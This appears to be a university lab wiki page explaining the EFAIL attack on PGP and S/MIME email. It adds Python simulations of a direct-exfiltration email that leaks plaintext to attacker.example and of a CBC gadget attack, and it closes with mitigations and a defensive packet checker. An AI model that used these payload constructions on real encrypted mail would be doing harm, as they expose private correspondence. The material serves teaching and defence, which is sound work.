E-Fail

From Embedded Lab Vienna for IoT & Security
Revision as of 22:46, 5 December 2021 by KBeboso

Summary

The EFAIL attack exploits weaknesses in the OpenPGP and S/MIME protocols to reveal the plaintext of encrypted emails. In short, EFAIL abuses active content in HTML emails, such as externally loaded images or styles, to leak the plaintext through the URL that the email client requests. To build such an exfiltration channel, the attacker first needs access to the encrypted emails, for example by eavesdropping on network traffic or by compromising email accounts, email servers, backup systems or client computers. These emails may have been collected many years ago. The attacker modifies the encrypted email in a specific way and sends the modified encrypted email to the victim. The victim's email client decrypts the email and loads the external content, which delivers the plaintext to the attacker.

Direct Exfiltration Channels in Email Clients

Direct exfiltration attacks exploit vulnerabilities in Apple Mail, iOS Mail and Mozilla Thunderbird to leak the plaintext of encrypted emails directly. These vulnerabilities can be fixed in the respective email client. The attacker creates a new multipart email with three body parts, as shown in Figure 3.3. The first is an HTML body part that essentially contains an HTML image tag; note that the src attribute of this image tag is opened with a quotation mark but not closed. The second body part contains the PGP or S/MIME ciphertext. The third is again an HTML body part that closes the src attribute of the first body part.

The attacker then sends this email to the victim. The victim's client decrypts the second body part and renders the three body parts as one HTML email, as illustrated in Figure 3.4. Note that the src attribute of the image tag opened in line 1 is only closed in line 4, so the URL spans all four lines.

Figure 3.4: HTML-Email [Uni21d]

The email client then URL-encodes all non-printable characters (e.g. %20 for a space) and requests the image from that URL. Because the plaintext of the encrypted email is part of the URL path, the victim's email client delivers the plaintext to the attacker. Direct exfiltration EFAIL attacks work against both PGP- and S/MIME-encrypted emails.

Figure 3.5: Email programs known to be vulnerable, to the knowledge of the security researchers who discovered the EFAIL vulnerability [PDM+18]
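The three-part email and the two possible client behaviours described above, as an added example that is not part of the original page and not code from the EFAIL authors. The attacker URL, the captured "ciphertext" block and the decryption stub are constructed stand-ins so that everything runs offline; the point is the difference between a client that renders all decrypted parts as one HTML document and a client that renders each part in isolation.

```python
"""Simulated EFAIL direct exfiltration: the three-part email and two clients.

Added example, not code from the page or from the EFAIL authors. The attacker
URL, the captured "ciphertext" and the decryption stub are constructed
stand-ins so that everything runs offline.
"""
import re
from email import message_from_string
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from urllib.parse import quote

ATTACKER_URL = "https://attacker.example/"      # hypothetical collection server
# Constructed stand-in for a PGP message the attacker captured earlier.
CAPTURED_CIPHERTEXT = ("-----BEGIN PGP MESSAGE-----\n"
                       "(constructed placeholder, not a real ciphertext)\n"
                       "-----END PGP MESSAGE-----")
# What the victim's key would recover from it (constructed for the demo).
DEMO_PLAINTEXT = "Secret meeting\nWednesday 10:00"


def build_direct_exfil_email(ciphertext: str) -> str:
    """The three-part email of Figure 3.3: <img src=" | ciphertext | ">."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "attacker@example.net"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Re: our meeting"
    msg.attach(MIMEText('<img src="' + ATTACKER_URL, "html"))  # quote opened, never closed
    msg.attach(MIMEText(ciphertext, "plain"))                  # the part the client decrypts
    msg.attach(MIMEText('">', "html"))                         # closes the quote and the tag
    return msg.as_string()


def demo_decrypt(text: str) -> str:
    """Stand-in for the client's PGP/S-MIME layer: only knows the demo message."""
    return DEMO_PLAINTEXT if text.strip() == CAPTURED_CIPHERTEXT else text


IMG_SRC = re.compile(r'<img\s+src="([^"]*)"', re.DOTALL)


def image_requests(html: str) -> list:
    """URLs a renderer that loads remote images would fetch, percent-encoded
    as the text describes (space -> %20, newline -> %0A)."""
    return [quote(src, safe="/:") for src in IMG_SRC.findall(html)]


def _decrypted_bodies(raw_email: str, decrypt) -> list:
    msg = message_from_string(raw_email)
    return [decrypt(p.get_payload(decode=True).decode()) for p in msg.walk()
            if not p.is_multipart()]


def vulnerable_client(raw_email: str, decrypt=demo_decrypt) -> list:
    """Decrypts every part, then renders all parts as ONE HTML document, so the
    open quote in part 1 swallows the plaintext of part 2 into the image URL."""
    return image_requests("\n".join(_decrypted_bodies(raw_email, decrypt)))


def hardened_client(raw_email: str, decrypt=demo_decrypt, load_remote=False) -> list:
    """Renders each MIME part as its own isolated document and, by default,
    loads no remote content at all (the short-term mitigation of this page)."""
    requests = []
    for body in _decrypted_bodies(raw_email, decrypt):
        if load_remote:
            requests.extend(image_requests(body))
    return requests
```

With the vulnerable client the single image request starts with https://attacker.example/%0A and carries Secret%20meeting%0AWednesday%2010:00 in its path, which is exactly the leak of Figure 3.4. The hardened client issues no request even when remote loading is switched back on, because the unterminated tag in part 1 never meets its closing quote in part 3 once the parts are rendered separately.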


The CBC/CFB-Gadget-Attack

We first go through the CBC/CFB gadget attacks, which exploit weaknesses in the OpenPGP and S/MIME specifications to steal plaintext. The concept of a CBC gadget in S/MIME is depicted in Figure 3.1. Because of how the CBC mode of operation chains blocks, an attacker who knows one plaintext block can precisely modify that block. As seen in Figure 3.1 (a), S/MIME-encrypted emails frequently begin with "Content-Type: multipart/signed", so the attacker knows at least one complete plaintext block. From it, the attacker can create a canonical plaintext block whose content is all zeros, as seen in Figure 3.1 (b); the block pair (X, C0) is referred to as a CBC gadget. In step (c), the attacker inserts CBC gadgets into the ciphertext to inject an image tag. When the user opens the attacker's email, the result is a single piece of encrypted text that exfiltrates its own plaintext. OpenPGP employs the CFB mode of operation, whose cryptographic properties are very similar to those of CBC and allow the same attack to be carried out with CFB gadgets. The difference from the direct exfiltration attacks is that any standard-conforming client will be vulnerable, and each vendor is free to devise its own mitigations, which may or may not prevent the attacks. As a result, the specifications will have to be updated in the long run, so that the changes addressing the root causes of the vulnerabilities are documented.

Although the CBC/CFB gadget attacks on PGP and S/MIME are theoretically similar, the conditions for a successful attack differ significantly. Attacking S/MIME is simple: by sending a single crafted S/MIME email to the target, an attacker can break several (in the researchers' experiments, up to 500) S/MIME-encrypted emails at once. Modern OpenPGP implementations, unlike S/MIME, include a Modification Detection Code (MDC) that can detect modified plaintexts and so prevent the CFB gadget attack. However, the researchers found several clients that still displayed the modified plaintext after merely issuing a warning to the user about the invalid MDC.

This made the CFB gadget attack possible despite the MDC. PGP also compresses the plaintext before encrypting it, which makes guessing known plaintext bytes harder. Based on the findings so far, the CFB gadget attack against PGP has a success rate of about one in three attempts. The researchers consider plaintext compression a technical hurdle rather than a fundamental limitation of the EFAIL attacks, and expect further research to make the attacks more efficient.
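The CBC gadget construction of Figure 3.1, carried through end to end as an added example (not the EFAIL paper's code). The block cipher is a toy 16-byte Feistel permutation standing in for AES, because the gadget relies only on CBC chaining and the attacker never evaluates the cipher; padding is done with spaces instead of PKCS#7, the victim's body is constructed, and http://a/ is a hypothetical attacker host. The attacker side needs no key: one known plaintext block gives D(C0) = P0 XOR IV, and each gadget (D(C0) XOR X, C0) decrypts to one garbage block followed by the chosen block X.

```python
"""CBC gadget attack on a CBC-encrypted S/MIME body, simulated end to end.

Added example, not the EFAIL paper's code. The block cipher is a toy
16-byte Feistel permutation standing in for AES (the gadget only relies on
CBC chaining and never evaluates the cipher), padding uses spaces instead of
PKCS#7, and http://a/ is a hypothetical attacker host.
"""
import hashlib
import re

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    """4-round Feistel network over SHA-256: a stand-in keyed permutation."""
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _f(key, i, r))
    return l + r


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, i, l)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = toy_encrypt_block(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    """P_i = D_k(C_i) XOR C_{i-1}: each block depends only on its predecessor."""
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        c = ct[i:i + BLOCK]
        out.append(xor(toy_decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)


def build_gadget_ciphertext(iv, ct, known_p0, prefix, suffix):
    """Attacker side, no key. Returns (iv', ct') whose decryption reads
    prefix[0], [garbage, prefix[i]]..., garbage, P0..Pn, [garbage, suffix[i]]...
    One known block gives D_k(C0) = P0 XOR IV; the pair (D_k(C0) XOR X, C0) is a
    CBC gadget that decrypts to one garbage block followed by the chosen X."""
    c0 = ct[:BLOCK]
    d_c0 = xor(known_p0, iv)

    def gadget(x: bytes) -> bytes:
        return xor(d_c0, x) + c0

    new_iv = xor(d_c0, prefix[0])              # C0 now decrypts straight to prefix[0]
    body = c0 + b"".join(gadget(x) for x in prefix[1:])
    body += iv + ct                            # original IV before C0 keeps P0..Pn intact
    body += b"".join(gadget(x) for x in suffix)
    return new_iv, body


IMG_SRC = re.compile(r'<img ignore="[^"]*" src="([^"]*)"', re.DOTALL)
VICTIM_PLAINTEXT = (b"Content-Type: multipart/signed;\r\n\r\n"
                    b"The secret: merger closes Friday")     # constructed
KNOWN_P0 = b"Content-Type: mu"      # S/MIME bodies start this way (Figure 3.1 a)


def run_demo(key: bytes, iv: bytes):
    """Encrypts the victim's mail, rewrites it with gadgets, decrypts it as the
    victim's client would and returns (rendered bytes, leaked URL or None)."""
    pt = VICTIM_PLAINTEXT + b" " * ((-len(VICTIM_PLAINTEXT)) % BLOCK)
    ct = cbc_encrypt(key, iv, pt)
    prefix = [b'<img ignore="'.ljust(BLOCK), b'" src="http://a/']   # 16 bytes each
    suffix = [b'">'.ljust(BLOCK)]
    iv2, ct2 = build_gadget_ciphertext(iv, ct, KNOWN_P0, prefix, suffix)
    rendered = cbc_decrypt(key, iv2, ct2)
    m = IMG_SRC.search(rendered.decode("latin-1"))
    return rendered, (m.group(1) if m else None)
```

The decrypted document comes out as the chosen tag opening, a garbage block hidden in the ignore attribute, the src prefix, a garbage block, the complete original S/MIME body, another garbage block and the closing of the tag, so the whole body ends up in the image URL. The garbage blocks are placed inside attribute values because an HTML parser tolerates them there; a quotation mark inside one of them breaks the tag, which is one reason the attack is probabilistic (run_demo then returns None for the URL). CFB gadgets in OpenPGP follow the same idea, since in CFB a known plaintext block likewise reveals the keystream block that the previous ciphertext block produces.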


Mitigations

To continue using email encryption securely, users must implement the following points to prevent EFAIL attacks. This section is divided into three time frames to indicate the urgency of each measure.

Short-Term

Active content in the email client must be disabled. This includes HTML code execution and the reloading of external material, which is frequently allowed for aesthetic reasons. Email servers and email clients must be secured against unauthorized access attempts. Moreover, in the case of OpenPGP, you can decrypt the emails in an external program instead of in the mail client, so that an attack comes to nothing.

Short term: No decryption in the email client. Decrypting S/MIME or PGP emails in a separate program outside of your email client is the simplest strategy to avoid EFAIL attacks. Remove your S/MIME and PGP private keys from your email client and decrypt incoming encrypted emails by copying and pasting the ciphertext into a separate program that handles the decryption for you. In this manner, email clients are unable to open exfiltration channels. This is currently the safest option, with the downside that the process becomes more involved.

Short term: Disable HTML rendering. The EFAIL attacks abuse active content, mostly in the form of HTML images, styles and other elements. The most common approach to fighting EFAIL is to disable the rendering of incoming HTML emails in your email client. Note that email clients have other possible backchannels that are not linked to HTML, but these are more difficult to attack.

Mid-Term

Mid term: Update the email client. Vendors of email clients will publish patches that either fix the EFAIL vulnerabilities or make them much harder to exploit.

Long-Term

Long term: Update the OpenPGP and S/MIME standards. The EFAIL attacks exploit flaws and undefined behavior in the MIME, S/MIME and OpenPGP standards. As a result, the standards must be changed, which will take time. Update: The advice to deprecate the SE packet type and not to display modified ciphertexts is reflected in the current draft revision of the OpenPGP standard RFC 4880 [CalAD]. The CFB gadget attacks can also be prevented by client updates: the programs just have to evaluate the MDC correctly (which GnuPG does by now; a failed MDC check now aborts the decryption) and reject the outdated SE packets, so that the attacks are no longer possible. The CBC gadget attacks cannot be properly prevented until an updated S/MIME standard is released. Until then, individual developers have to develop their own solutions.
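A check for the packet-level part of that advice, as an added example that is neither GnuPG's nor the page's code: parse the OpenPGP packet headers of a message (RFC 4880, section 4.2) far enough to list the packet tags, then reject the message if it carries the legacy Symmetrically Encrypted Data packet (tag 9, no MDC) instead of the Symmetrically Encrypted Integrity Protected Data packet (tag 18). The sample messages are constructed; their packet bodies are filler, only the headers matter.

```python
"""Reject OpenPGP messages that use the legacy SE packet (tag 9, no MDC).

Added example, not GnuPG's code. It parses packet headers (RFC 4880,
section 4.2) only far enough to list the tags, then applies the policy the
text describes: accept tag 18 (SEIPD, carries an MDC), reject tag 9 (SED).
"""

SED, SEIPD = 9, 18


def read_header(buf: bytes, pos: int):
    """Returns (tag, body_length, header_length) for the packet at pos.
    Partial and indeterminate body lengths are rejected: the tag is the point."""
    ptag = buf[pos]
    if not ptag & 0x80:
        raise ValueError("not a packet header at offset %d" % pos)
    if ptag & 0x40:                            # new-format header
        tag = ptag & 0x3F
        b = buf[pos + 1]
        if b < 192:
            return tag, b, 2
        if b < 224:
            return tag, ((b - 192) << 8) + buf[pos + 2] + 192, 3
        if b == 255:
            return tag, int.from_bytes(buf[pos + 2:pos + 6], "big"), 6
        raise ValueError("partial body length not supported")
    tag = (ptag >> 2) & 0x0F                   # old-format header
    ltype = ptag & 0x03
    if ltype == 3:
        raise ValueError("indeterminate length not supported")
    n = (1, 2, 4)[ltype]
    return tag, int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), 1 + n


def packet_tags(msg: bytes) -> list:
    """Walks the packet sequence and returns the tags in order."""
    tags, pos = [], 0
    while pos < len(msg):
        tag, blen, hlen = read_header(msg, pos)
        tags.append(tag)
        pos += hlen + blen
    if pos != len(msg):
        raise ValueError("truncated packet")
    return tags


def check_integrity_protection(msg: bytes):
    """(accepted, reason): the 'reject the outdated SE packets' rule."""
    tags = packet_tags(msg)
    if SED in tags:
        return False, "legacy SED packet (tag 9) carries no MDC: rejected"
    if SEIPD not in tags:
        return False, "no SEIPD packet (tag 18): nothing is integrity protected"
    return True, "SEIPD present; the client must still verify the MDC and abort on mismatch"


# Constructed sample messages: only the headers carry meaning, bodies are filler.
MODERN = bytes([0xC1, 3]) + b"pke" + bytes([0xD2, 4]) + b"\x01abc"   # PKESK + SEIPD
LEGACY = bytes([0xC1, 3]) + b"pke" + bytes([0xA4, 3]) + b"abc"       # PKESK + old-format SED
```

The check is deliberately only the packet-type half of the mitigation: a message that passes still has to have its MDC verified, and a client that merely warns on an MDC mismatch and shows the plaintext anyway is exactly the behaviour the researchers found exploitable.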

Conclusion

References

[CalAD] J. Callas. RFC 4880, Nov 2007. URL: https://datatracker.ietf.org/doc/html/rfc4880.
[Cor19] MITRE Corporation, 2019. URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13050.
[Gar96] Simson Garfinkel. PGP: Pretty Good Privacy. O'Reilly, Internat. Thomson-Verl, 1996.
[MKP+17] Juan Ramón Ponce Mauriés, Kat Krol, Simon Parkin, Ruba Abu-Salma, and M. Angela Sasse. Dead on arrival: Recovering from fatal flaws in email encryption tools. In The LASER Workshop: Learning from Authoritative Security Experiment Results (LASER 2017), pages 49–57. USENIX Association, October 2017. URL: https://www.usenix.org/conference/laser2017/presentation/mauries.
[OAS21] OASIS. How email really works, 2021. [Online; accessed December 05, 2021]. URL: https://www.oasis-open.org/khelp/kmlm/user_help/html/images/howemailworks.png.
[PDM+18] Damian Poddebniak, Christian Dresen, Jens Mueller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Joerg Schwenk. Efail: Breaking S/MIME and OpenPGP email encryption using exfiltration channels. In 27th USENIX Security Symposium (USENIX Security 18), pages 549–566, Baltimore, MD, August 2018. USENIX Association. URL: https://www.usenix.org/conference/usenixsecurity18/presentation/poddebniak.
[Pos] J. Postel. Simple Mail Transfer Protocol. URL: https://tools.ietf.org/html/rfc821/.
[Pur21] PurpleSec. 2021 ransomware statistics, Aug 2021. URL: https://purplesec.us/resources/cyber-security-statistics/ransomware/.
[Ram99] B. Ramsdell. RFC 2633, Jun 1999. URL: https://datatracker.ietf.org/doc/html/rfc2633.
[Rhe13] Man Rhee. Electronic Mail Security: PGP, S/MIME, pages 353–385. Wiley, 03 2013. doi:10.1002/9781118512920.ch10.
[Spi16] Dag Spicer. Raymond Tomlinson: Email pioneer, part 1. IEEE Annals of the History of Computing, 38:72–79, 04 2016. doi:10.1109/MAHC.2016.25.
[TR10] S. Turner and B. Ramsdell. RFC 5751, Jan 2010. URL: https://datatracker.ietf.org/doc/html/rfc5751.
[Uni21a] University of Applied Sciences Münster. CBC gadgets in S/MIME, 2021. [Online; accessed December 05, 2021]. URL: https://efail.de/media/img/smime-attack.png.
[Uni21b] University of Applied Sciences Münster. Direct exfiltration, 2021. [Online; accessed December 05, 2021]. URL: https://efail.de/media/img/exfil1.png.
[Uni21c] University of Applied Sciences Münster. Direct exfiltration, 2021. [Online; accessed December 05, 2021]. URL: https://efail.de/media/img/exfil2.png.
[Uni21d] University of Applied Sciences Münster. Direct exfiltration, 2021. [Online; accessed December 05, 2021]. URL: https://efail.de/media/img/exfil3.png.